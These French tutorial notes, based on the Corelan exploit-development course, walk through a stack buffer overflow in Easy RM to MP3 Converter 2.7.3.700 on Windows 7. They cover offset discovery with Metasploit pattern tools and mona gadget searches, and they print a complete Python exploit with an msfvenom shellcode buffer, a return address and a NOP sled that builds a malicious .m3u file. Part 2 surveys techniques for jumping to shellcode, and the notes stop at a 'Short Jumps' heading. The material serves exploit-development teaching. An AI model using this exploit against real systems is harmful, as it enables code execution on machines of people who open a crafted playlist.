Corelan Exploit Course
Partie 1: Stack Based Overflows
Basé sur la première partie du cours de Corelan sur le développement d’exploits.
On s’intéresse au logiciel Easy RM to MP3 Converter qui peut charger des fichiers. Si on charge un fichier trop grand on a un crash. Ce qui suit est un test avec Windows Seven Ultimate.
python -c "print('A'*30000)" > crash.m3u
On utilise ensuite metasploit pour créer un pattern pour identifier l’offset (Note: pattern_create est limité en taille et des répétitions peuvent apparaître. Il est recommandé de se limiter à des patterns inférieurs à 1000 cararctères et de compléter avec des ‘A’):
python3 -c "print('A'*20000, end='')" > file.m3u
pattern_create.rb 10000 >> file.m3u
On trouve alors que la valeur d’EIP est 76483676:
pattern_offset.rb 76483676
[*] Exact match at offset 6109
On a donc un offset de 26109 caractères. On peut confirmer que tout fonctionne correctement avec ce bout de code:
python -c "print('A'*26109+'BBBB'+'C'*(30000-26110))" > file.m3u
Par ailleurs qu’on a des C à partir de ESP. On peut donc injecter notre shellcode à l’intérieur. On utilise alors mona pour trouver un moyen de jumper sur ESP:
!mona modules
0BADF00D !mona modules
---------- Mona command started on 2016-04-17 15:20:03 (v2.0, rev 566) ----------
0BADF00D [+] Processing arguments and criteria
0BADF00D - Pointer access level : X
0BADF00D [+] Generating module info table, hang on...
0BADF00D - Processing modules
0BADF00D - Done. Let's rock 'n roll.
0BADF00D ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D Module info :
0BADF00D ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
0BADF00D ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D 0x6b2b0000 | 0x6b316000 | 0x00066000 | True | True | True | True | True | 7.0.7600.16385 [MSVCP60.dll] (C:\Windows\system32\MSVCP60.dll)
0BADF00D 0x71440000 | 0x71472000 | 0x00032000 | True | True | True | True | True | 6.1.7600.16385 [WINMM.dll] (C:\Windows\system32\WINMM.dll)
0BADF00D 0x734d0000 | 0x734d6000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [sensapi.dll] (C:\Windows\system32\sensapi.dll)
0BADF00D 0x77110000 | 0x77246000 | 0x00136000 | True | True | True | True | True | 8.00.7600.16385 [urlmon.dll] (C:\Windows\system32\urlmon.dll)
0BADF00D 0x00400000 | 0x004be000 | 0x000be000 | False | False | False | False | False | 2.7.3.700 [RM2MP3Converter.exe] (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)
0BADF00D 0x74550000 | 0x74560000 | 0x00010000 | True | True | True | True | True | 6.1.7601.17514 [NLAapi.dll] (C:\Windows\system32\NLAapi.dll)
0BADF00D 0x75970000 | 0x75a8d000 | 0x0011d000 | True | True | True | True | True | 6.1.7600.16385 [CRYPT32.dll] (C:\Windows\system32\CRYPT32.dll)
0BADF00D 0x758a0000 | 0x758ac000 | 0x0000c000 | True | True | True | True | True | 6.1.7601.17514 [MSASN1.dll] (C:\Windows\system32\MSASN1.dll)
0BADF00D 0x75310000 | 0x75316000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [wship6.dll] (C:\Windows\System32\wship6.dll)
0BADF00D 0x76140000 | 0x76214000 | 0x000d4000 | True | True | True | True | True | 6.1.7600.16385 [kernel32.dll] (C:\Windows\system32\kernel32.dll)
0BADF00D 0x774e0000 | 0x7758c000 | 0x000ac000 | True | True | True | True | True | 7.0.7600.16385 [msvcrt.dll] (C:\Windows\system32\msvcrt.dll)
0BADF00D 0x75780000 | 0x7578c000 | 0x0000c000 | True | True | True | True | True | 6.1.7600.16385 [CRYPTBASE.dll] (C:\Windows\system32\CRYPTBASE.dll)
0BADF00D 0x74150000 | 0x74163000 | 0x00013000 | True | True | True | True | True | 6.1.7600.16385 [dwmapi.dll] (C:\Windows\system32\dwmapi.dll)
0BADF00D 0x776e0000 | 0x7781c000 | 0x0013c000 | True | True | True | True | True | 6.1.7600.16385 [ntdll.dll] (C:\Windows\SYSTEM32\ntdll.dll)
0BADF00D 0x01430000 | 0x014a1000 | 0x00071000 | True | False | False | False | False | -1.0- [MSRMCcodec00.dll] (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec00.dll)
0BADF00D 0x74fc0000 | 0x75004000 | 0x00044000 | True | True | True | True | True | 6.1.7600.16385 [dnsapi.DLL] (C:\Windows\system32\dnsapi.DLL)
0BADF00D 0x778a0000 | 0x778b9000 | 0x00019000 | True | True | True | True | True | 6.1.7600.16385 [sechost.dll] (C:\Windows\SYSTEM32\sechost.dll)
0BADF00D 0x6b720000 | 0x6b758000 | 0x00038000 | True | True | True | True | True | 6.1.7600.16385 [odbcint.dll] (C:\Windows\system32\odbcint.dll)
0BADF00D 0x74c30000 | 0x74c35000 | 0x00005000 | True | True | True | True | True | 6.1.7600.16385 [wshtcpip.dll] (C:\Windows\System32\wshtcpip.dll)
0BADF00D 0x03150000 | 0x0361d000 | 0x004cd000 | True | False | False | False | False | -1.0- [MSRMCcodec02.dll] (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
0BADF00D 0x6fd50000 | 0x6fd61000 | 0x00011000 | True | True | True | True | True | 7.0.7600.16385 [MSVCIRT.dll] (C:\Windows\system32\MSVCIRT.dll)
0BADF00D 0x77830000 | 0x7783a000 | 0x0000a000 | True | True | True | True | True | 6.1.7600.16385 [LPK.dll] (C:\Windows\system32\LPK.dll)
0BADF00D 0x003f0000 | 0x00400000 | 0x00010000 | True | False | False | False | False | -1.0- [MSRMfilter02.dll] (C:\Program Files\Easy RM to MP3 Converter\MSRMfilter02.dll)
0BADF00D 0x75f40000 | 0x7613b000 | 0x001fb000 | True | True | True | True | True | 8.00.7601.17514 [iertutil.dll] (C:\Windows\system32\iertutil.dll)
0BADF00D 0x77380000 | 0x7741d000 | 0x0009d000 | True | True | True | True | True | 1.0626.7601.17514 [USP10.dll] (C:\Windows\system32\USP10.dll)
0BADF00D 0x71560000 | 0x71566000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [rasadhlp.dll] (C:\Windows\system32\rasadhlp.dll)
0BADF00D 0x73b90000 | 0x73bc8000 | 0x00038000 | True | True | True | True | True | 6.1.7600.16385 [fwpuclnt.dll] (C:\Windows\System32\fwpuclnt.dll)
0BADF00D 0x74df0000 | 0x74df7000 | 0x00007000 | True | True | True | True | True | 6.1.7600.16385 [WINNSI.DLL] (C:\Windows\system32\WINNSI.DLL)
0BADF00D 0x75710000 | 0x7572b000 | 0x0001b000 | True | True | True | True | True | 6.1.7601.17514 [SspiCli.dll] (C:\Windows\system32\SspiCli.dll)
0BADF00D 0x74e00000 | 0x74e1c000 | 0x0001c000 | True | True | True | True | True | 6.1.7600.16385 [iphlpapi.DLL] (C:\Windows\system32\iphlpapi.DLL)
0BADF00D 0x6a620000 | 0x6a73c000 | 0x0011c000 | True | True | True | True | True | 6.06.8063.0 [MFC42.DLL] (C:\Windows\system32\MFC42.DLL)
0BADF00D 0x75b40000 | 0x75c9c000 | 0x0015c000 | True | True | True | True | True | 6.1.7600.16385 [ole32.dll] (C:\Windows\system32\ole32.dll)
0BADF00D 0x77480000 | 0x774d7000 | 0x00057000 | True | True | True | True | True | 6.1.7600.16385 [SHLWAPI.dll] (C:\Windows\system32\SHLWAPI.dll)
0BADF00D 0x75ca0000 | 0x75d69000 | 0x000c9000 | True | True | True | True | True | 6.1.7601.17514 [USER32.dll] (C:\Windows\system32\USER32.dll)
0BADF00D 0x75d70000 | 0x75d8f000 | 0x0001f000 | True | True | True | True | True | 6.1.7601.17514 [IMM32.DLL] (C:\Windows\system32\IMM32.DLL)
0BADF00D 0x77590000 | 0x7760b000 | 0x0007b000 | True | True | True | True | True | 6.1.7600.16385 [comdlg32.dll] (C:\Windows\system32\comdlg32.dll)
0BADF00D 0x73820000 | 0x7382d000 | 0x0000d000 | True | True | True | True | True | 6.1.7601.17514 [rtutils.dll] (C:\Windows\system32\rtutils.dll)
0BADF00D 0x6fd90000 | 0x6fe1c000 | 0x0008c000 | True | True | True | True | True | 6.1.7601.17514 [ODBC32.dll] (C:\Windows\system32\ODBC32.dll)
0BADF00D 0x74dc0000 | 0x74de1000 | 0x00021000 | True | True | True | True | True | 6.1.7600.16385 [ntmarta.dll] (C:\Windows\system32\ntmarta.dll)
0BADF00D 0x70920000 | 0x70930000 | 0x00010000 | True | True | True | True | True | 6.1.7600.16385 [napinsp.dll] (C:\Windows\system32\napinsp.dll)
0BADF00D 0x745d0000 | 0x74610000 | 0x00040000 | True | True | True | True | True | 6.1.7600.16385 [uxtheme.dll] (C:\Windows\system32\uxtheme.dll)
0BADF00D 0x75eb0000 | 0x75f3f000 | 0x0008f000 | True | True | True | True | True | 6.1.7601.17514 [OLEAUT32.dll] (C:\Windows\system32\OLEAUT32.dll)
0BADF00D 0x72800000 | 0x72815000 | 0x00015000 | True | True | True | True | True | 6.1.7600.16385 [rasman.dll] (C:\Windows\system32\rasman.dll)
0BADF00D 0x76220000 | 0x76e6a000 | 0x00c4a000 | True | True | True | True | True | 6.1.7601.17514 [SHELL32.dll] (C:\Windows\system32\SHELL32.dll)
0BADF00D 0x75d90000 | 0x75e31000 | 0x000a1000 | True | True | True | True | True | 6.1.7600.16385 [RPCRT4.dll] (C:\Windows\system32\RPCRT4.dll)
0BADF00D 0x748d0000 | 0x74a6e000 | 0x0019e000 | True | True | True | True | True | 6.10 [comctl32.dll] (C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll)
0BADF00D 0x708f0000 | 0x708f8000 | 0x00008000 | True | True | True | True | True | 6.1.7600.16385 [winrnr.dll] (C:\Windows\System32\winrnr.dll)
0BADF00D 0x77010000 | 0x77105000 | 0x000f5000 | True | True | True | True | True | 8.00.7600.16385 [WININET.dll] (C:\Windows\system32\WININET.dll)
0BADF00D 0x6e6c0000 | 0x6e744000 | 0x00084000 | True | True | True | True | True | 5.82 [COMCTL32.dll] (C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32.dll)
0BADF00D 0x77850000 | 0x77895000 | 0x00045000 | True | True | True | True | True | 6.1.7600.16385 [WLDAP32.dll] (C:\Windows\system32\WLDAP32.dll)
0BADF00D 0x77610000 | 0x776dc000 | 0x000cc000 | True | True | True | True | True | 6.1.7600.16385 [MSCTF.dll] (C:\Windows\system32\MSCTF.dll)
0BADF00D 0x75800000 | 0x7580b000 | 0x0000b000 | True | True | True | True | True | 6.1.7600.16385 [profapi.dll] (C:\Windows\system32\profapi.dll)
0BADF00D 0x75ae0000 | 0x75b2a000 | 0x0004a000 | True | True | True | True | True | 6.1.7600.16385 [KERNELBASE.dll] (C:\Windows\system32\KERNELBASE.dll)
0BADF00D 0x74e20000 | 0x74e29000 | 0x00009000 | True | True | True | True | True | 6.1.7600.16385 [VERSION.dll] (C:\Windows\system32\VERSION.dll)
0BADF00D 0x75320000 | 0x7535c000 | 0x0003c000 | True | True | True | True | True | 6.1.7600.16385 [mswsock.dll] (C:\Windows\System32\mswsock.dll)
0BADF00D 0x014d0000 | 0x0156f000 | 0x0009f000 | True | False | False | False | False | -1.0- [MSRMfilter01.dll] (C:\Program Files\Easy RM to MP3 Converter\MSRMfilter01.dll)
0BADF00D 0x778c0000 | 0x7790e000 | 0x0004e000 | True | True | True | True | True | 6.1.7601.17514 [GDI32.dll] (C:\Windows\system32\GDI32.dll)
0BADF00D 0x003e0000 | 0x003e7000 | 0x00007000 | True | False | False | False | False | -1.0- [MSRMCcodec01.dll] (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec01.dll)
0BADF00D 0x72820000 | 0x72872000 | 0x00052000 | True | True | True | True | True | 6.1.7600.16385 [RASAPI32.dll] (C:\Windows\system32\RASAPI32.dll)
0BADF00D 0x70fd0000 | 0x71021000 | 0x00051000 | True | True | True | True | True | 6.1.7600.16385 [WINSPOOL.DRV] (C:\Windows\system32\WINSPOOL.DRV)
0BADF00D 0x10000000 | 0x10071000 | 0x00071000 | False | False | False | False | False | -1.0- [MSRMfilter03.dll] (C:\Program Files\Easy RM to MP3 Converter\MSRMfilter03.dll)
0BADF00D 0x01280000 | 0x01292000 | 0x00012000 | True | False | False | False | False | -1.0- [MSLog.dll] (C:\Program Files\Easy RM to MP3 Converter\MSLog.dll)
0BADF00D 0x772e0000 | 0x77380000 | 0x000a0000 | True | True | True | True | True | 6.1.7600.16385 [ADVAPI32.dll] (C:\Windows\system32\ADVAPI32.dll)
0BADF00D 0x00650000 | 0x0066e000 | 0x0001e000 | True | False | False | False | False | 1.0.1.8 [wmatimer.dll] (C:\Program Files\Easy RM to MP3 Converter\wmatimer.dll)
0BADF00D 0x75e40000 | 0x75e75000 | 0x00035000 | True | True | True | True | True | 6.1.7600.16385 [WS2_32.dll] (C:\Windows\system32\WS2_32.dll)
0BADF00D 0x77820000 | 0x77826000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [NSI.dll] (C:\Windows\system32\NSI.dll)
0BADF00D 0x70900000 | 0x70912000 | 0x00012000 | True | True | True | True | True | 6.1.7600.16385 [pnrpnsp.dll] (C:\Windows\system32\pnrpnsp.dll)
0BADF00D ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D
0BADF00D
0BADF00D [+] This mona.py action took 0:00:01.412000
[15:20:48] Thread 000006E4 terminated, exit code 0
Les seuls modules disponibles sans protection sont MSRMfilter03.dll et RM2MP3Converter.exe. Cependant les adresses de ce dernier contiennent le caractère nul (\x00) et ne sont pas utilisables.
Il est également possible d’utiliser mona pour trouver directement des séquences permettant de jmp esp:
0BADF00D [+] This mona.py action took 0:00:02.894000
0BADF00D [+] Command used:
0BADF00D !mona jmp -r esp -o
---------- Mona command started on 2016-04-18 12:24:59 (v2.0, rev 566) ----------
0BADF00D [+] Processing arguments and criteria
0BADF00D - Pointer access level : X
0BADF00D - Ignoring OS modules
0BADF00D [+] Generating module info table, hang on...
0BADF00D - Processing modules
0BADF00D - Done. Let's rock 'n roll.
0BADF00D [+] Querying 2 modules
0BADF00D - Querying module RM2MP3Converter.exe
0BADF00D - Querying module MSRMfilter03.dll
0BADF00D - Search complete, processing results
0BADF00D [+] Preparing output file 'jmp.txt'
0BADF00D - (Re)setting logfile jmp.txt
0BADF00D [+] Writing results to jmp.txt
0BADF00D - Number of pointers of type 'push esp # ret 0x08' : 1
0BADF00D - Number of pointers of type 'push esp # ret ' : 4
0BADF00D [+] Results :
004351F6 0x004351f6 : push esp # ret 0x08 | startnull {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.7.3.700 (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)
0041CFE8 0x0041cfe8 : push esp # ret | startnull {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.7.3.700 (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)
0043754C 0x0043754c : push esp # ret | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.7.3.700 (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)
0043AE68 0x0043ae68 : push esp # ret | startnull {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.7.3.700 (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)
1001B058 0x1001b058 : push esp # ret | {PAGE_EXECUTE_READ} [MSRMfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMfilter03.dll)
0BADF00D Found a total of 5 pointers
0BADF00D
0BADF00D [+] This mona.py action took 0:00:02.314000
[12:25:33] Thread 0000054C terminated, exit code 0
[12:26:32] Thread 000005F4 terminated, exit code 0
On trouve une adresse de retour utilisable: 0x1001b058. L’exploit final:
#!/bin/env python
# Exploit Title: Stack Overflow in Easy RM to MP3 Converter
# Date: 18/04/2016
# Exploit Author: Dude
# Vendor Homepage: [link]
# Software Link: [download link if available]
# Version: 2.7.3.700
# Tested on: Windows 7 SP1 Ultimate (Should work on every version)
# Exploit information
# Offset: 26109
# Return address: 0x1001b058 (push esp # ret in MSRMfilter03.dll)
# Payload: msfvenom -p windows/exec CMD=cmd.exe -f py --bad-chars "\x00\x0d\x0a"
offset = 20000 + 6109
ret = '\x58\xb0\x01\x10'
nop = '\x90'
buf = ""
buf += "\xd9\xcf\xbd\x0f\x30\x90\xb7\xd9\x74\x24\xf4\x58\x29"
buf += "\xc9\xb1\x31\x31\x68\x17\x83\xc0\x04\x03\x67\x23\x72"
buf += "\x42\x8b\xab\xf0\xad\x73\x2c\x95\x24\x96\x1d\x95\x53"
buf += "\xd3\x0e\x25\x17\xb1\xa2\xce\x75\x21\x30\xa2\x51\x46"
buf += "\xf1\x09\x84\x69\x02\x21\xf4\xe8\x80\x38\x29\xca\xb9"
buf += "\xf2\x3c\x0b\xfd\xef\xcd\x59\x56\x7b\x63\x4d\xd3\x31"
buf += "\xb8\xe6\xaf\xd4\xb8\x1b\x67\xd6\xe9\x8a\xf3\x81\x29"
buf += "\x2d\xd7\xb9\x63\x35\x34\x87\x3a\xce\x8e\x73\xbd\x06"
buf += "\xdf\x7c\x12\x67\xef\x8e\x6a\xa0\xc8\x70\x19\xd8\x2a"
buf += "\x0c\x1a\x1f\x50\xca\xaf\xbb\xf2\x99\x08\x67\x02\x4d"
buf += "\xce\xec\x08\x3a\x84\xaa\x0c\xbd\x49\xc1\x29\x36\x6c"
buf += "\x05\xb8\x0c\x4b\x81\xe0\xd7\xf2\x90\x4c\xb9\x0b\xc2"
buf += "\x2e\x66\xae\x89\xc3\x73\xc3\xd0\x89\x82\x51\x6f\xff"
buf += "\x85\x69\x6f\x50\xee\x58\xe4\x3f\x69\x65\x2f\x04\x85"
buf += "\x2f\x6d\x2d\x0e\xf6\xe4\x6f\x53\x09\xd3\xac\x6a\x8a"
buf += "\xd1\x4c\x89\x92\x90\x49\xd5\x14\x49\x20\x46\xf1\x6d"
buf += "\x97\x67\xd0\x0e\x7a\xfc\xf5\xb5\xfc\x99\x09"
# Creating file content
content = nop*offset+ret+nop*100+buf+nop*(30000-4-offset-100-len(buf))
# Creating payload file
f = open('file.m3u','w')
f.write(content)
Partie 2: Jumping to shellcode
Basé sur la seconde partie du cours de Corelan sur le développement d’exploits. Il est également possible de trouver des informations intéressantes sur SecuritySift
Cette section décrit différente manières de jumper sur le shellcode injecté:
- jmp [reg]: On jumpe directement sur notre shellcode
- call [reg]: Identique à jmp [reg]
- pop [reg] ret: L’instruction pop [reg] retire un élément de la stack et le stocke dans [reg]. Ceci est utile dans le cas où une adresse utile est stockée sur la stack. On effectue des pop jusqu’à être au niveau de cette adresse puis on fait un ret
- push [reg] ret: Relativement simple, on pousse l’adresse d’un registre sur la pile et on fait un ret. Ceci fonctionne bien si le shellcode est situé directement à l’adresse contenue dans le registre.
- jmp [reg]+[offset]: On fait un jmp sur [reg] avec un offset prédéfini. C’est utile si le registre ne pointe pas directement sur la valeur qui nous intéresse.
- blind return
Avec mona
On peut trouver des instructions du type jmp [reg], call [reg], push [reg] ret avec mona. Il suffit de faire:
!mona jmp -r esp -cm aslr=true,safeseh=true,rebase=true
Mona renvoie les informations suivantes (Note: il peut être utile de retirer les flags pour n’avoir que des éléments qui ne seront pas randomisés).
0BADF00D [+] This mona.py action took 0:00:00
0BADF00D [+] Command used:
0BADF00D !mona jmp -r esp -cm aslr=true,safeseh=true,rebase=true
---------- Mona command started on 2016-04-18 15:18:38 (v2.0, rev 566) ----------
0BADF00D [+] Processing arguments and criteria
0BADF00D - Pointer access level : X
0BADF00D - Module criteria : ['aslr=true', 'safeseh=true', 'rebase=true']
0BADF00D [+] Generating module info table, hang on...
0BADF00D - Processing modules
0BADF00D - Done. Let's rock 'n roll.
0BADF00D [+] Querying 67 modules
0BADF00D - Querying module MSVCP60.dll
0BADF00D - Querying module WINMM.dll
0BADF00D - Querying module rasman.dll
0BADF00D - Querying module urlmon.dll
0BADF00D - Querying module RM2MP3Converter.exe
0BADF00D - Querying module NLAapi.dll
0BADF00D - Querying module CRYPT32.dll
0BADF00D - Querying module MSASN1.dll
0BADF00D - Querying module wship6.dll
0BADF00D - Querying module kernel32.dll
0BADF00D - Querying module msvcrt.dll
0BADF00D - Querying module CRYPTBASE.dll
0BADF00D - Querying module dwmapi.dll
0BADF00D - Querying module ntdll.dll
0BADF00D - Querying module MSRMCcodec00.dll
0BADF00D - Querying module dnsapi.DLL
0BADF00D - Querying module sechost.dll
0BADF00D - Querying module odbcint.dll
0BADF00D - Querying module wshtcpip.dll
0BADF00D - Querying module MSRMCcodec02.dll
0BADF00D - Querying module MSVCIRT.dll
0BADF00D - Querying module LPK.dll
0BADF00D - Querying module MSRMfilter02.dll
0BADF00D - Querying module iertutil.dll
0BADF00D - Querying module VERSION.dll
0BADF00D - Querying module USP10.dll
0BADF00D - Querying module rasadhlp.dll
0BADF00D - Querying module fwpuclnt.dll
0BADF00D - Querying module WINNSI.DLL
0BADF00D - Querying module SspiCli.dll
0BADF00D - Querying module iphlpapi.DLL
0BADF00D - Querying module MFC42.DLL
0BADF00D - Querying module ole32.dll
0BADF00D - Querying module IMM32.DLL
0BADF00D - Querying module USER32.dll
0BADF00D - Querying module comdlg32.dll
0BADF00D - Querying module rtutils.dll
0BADF00D - Querying module ODBC32.dll
0BADF00D - Querying module ntmarta.dll
0BADF00D - Querying module napinsp.dll
0BADF00D - Querying module uxtheme.dll
0BADF00D - Querying module OLEAUT32.dll
0BADF00D - Querying module sensapi.dll
0BADF00D - Querying module SHELL32.dll
0BADF00D - Querying module RPCRT4.dll
0BADF00D - Querying module comctl32.dll
0BADF00D - Querying module winrnr.dll
0BADF00D - Querying module WININET.dll
0BADF00D - Querying module SHLWAPI.dll
0BADF00D - Querying module MSCTF.dll
0BADF00D - Querying module WLDAP32.dll
0BADF00D - Querying module profapi.dll
0BADF00D - Querying module KERNELBASE.dll
0BADF00D - Querying module COMCTL32.dll
0BADF00D - Querying module mswsock.dll
0BADF00D - Querying module MSRMfilter01.dll
0BADF00D - Querying module GDI32.dll
0BADF00D - Querying module MSRMCcodec01.dll
0BADF00D - Querying module RASAPI32.dll
0BADF00D - Querying module WINSPOOL.DRV
0BADF00D - Querying module MSRMfilter03.dll
0BADF00D - Querying module MSLog.dll
0BADF00D - Querying module ADVAPI32.dll
0BADF00D - Querying module wmatimer.dll
0BADF00D - Querying module WS2_32.dll
0BADF00D - Querying module NSI.dll
0BADF00D - Querying module pnrpnsp.dll
0BADF00D - Search complete, processing results
0BADF00D [+] Preparing output file 'jmp.txt'
0BADF00D - (Re)setting logfile jmp.txt
0BADF00D [+] Writing results to jmp.txt
0BADF00D - Number of pointers of type 'push esp # ret 0x08' : 7
0BADF00D - Number of pointers of type 'push esp # ret 0x0c' : 2
0BADF00D - Number of pointers of type 'push esp # ret 0x04' : 10
0BADF00D - Number of pointers of type 'push esp # ret 0x10' : 20
0BADF00D - Number of pointers of type 'jmp esp' : 130
0BADF00D - Number of pointers of type 'call esp' : 106
0BADF00D - Number of pointers of type 'push esp # ret ' : 223
0BADF00D [+] Results :
004351F6 0x004351f6 : push esp # ret 0x08 | startnull {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.7.3.700 (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)
027DC2BC 0x027dc2bc (b+0x0007c2bc) : push esp # ret 0x08 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
027DC443 0x027dc443 (b+0x0007c443) : push esp # ret 0x08 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
027DC48D 0x027dc48d (b+0x0007c48d) : push esp # ret 0x08 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
027E0DBD 0x027e0dbd (b+0x00080dbd) : push esp # ret 0x08 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
0287803D 0x0287803d (b+0x0011803d) : push esp # ret 0x08 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
029036DE 0x029036de (b+0x001a36de) : push esp # ret 0x08 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
028A02AF 0x028a02af (b+0x001402af) : push esp # ret 0x0c | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
0126AAF1 0x0126aaf1 (b+0x0000aaf1) : push esp # ret 0x0c | {PAGE_EXECUTE_READ} [wmatimer.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v1.0.1.8 (C:\Program Files\Easy RM to MP3 Converter\wmatimer.dll)
772752B6 0x772752b6 (b+0x000252b6) : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7600.16385 (C:\Windows\SYSTEM32\ntdll.dll)
027D6B5E 0x027d6b5e (b+0x00076b5e) : push esp # ret 0x04 | ascii {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
027DB887 0x027db887 (b+0x0007b887) : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
027DC0AD 0x027dc0ad (b+0x0007c0ad) : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
0281F115 0x0281f115 (b+0x000bf115) : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
0281F22F 0x0281f22f (b+0x000bf22f) : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
0286E7EF 0x0286e7ef (b+0x0010e7ef) : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
0289F796 0x0289f796 (b+0x0013f796) : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
028EE4E0 0x028ee4e0 (b+0x0018e4e0) : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
76A57ECC 0x76a57ecc (b+0x001d7ecc) : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [iertutil.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v8.00.7601.17514 (C:\Windows\system32\iertutil.dll)
027E88E7 0x027e88e7 (b+0x000888e7) : push esp # ret 0x10 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
0BADF00D ... Please wait while I'm processing all remaining results and writing everything to file...
0BADF00D [+] Done. Only the first 20 pointers are shown here. For more pointers, open jmp.txt...
0BADF00D Found a total of 498 pointers
0BADF00D
0BADF00D [+] This mona.py action took 0:00:46.827000
Cas des petits buffers
Dans le cas où on a un buffer trop petit pour le shellcode, mais que celui peut être stocké ailleurs (ex: Au niveau d’un autre registre), alors il est possible d’utiliser le petit buffer pour écrire un shellcode pour jumper sur notre buffer plus étendu. Dans l’exemple de Corelan on vise ESP+150 et on s’interdit d’utiliser les caractères entre ESP+50 et ESP+150. Le payload suivant est efficient:
- mov eax, esp
- add eax, 0x32 (ajoute 50 à EAX)
- add eax, 0x32 (ajoute 50 à EAX)
- add eax, 0x32 (ajoute 50 à EAX)
- jmp eax
Dans l’exemple ils font directement add esp, 0x32 puis jmp esp mais ça fout vraiment le bordel dans la pile, donc il vaut peut être mieux éviter.
Short Jumps
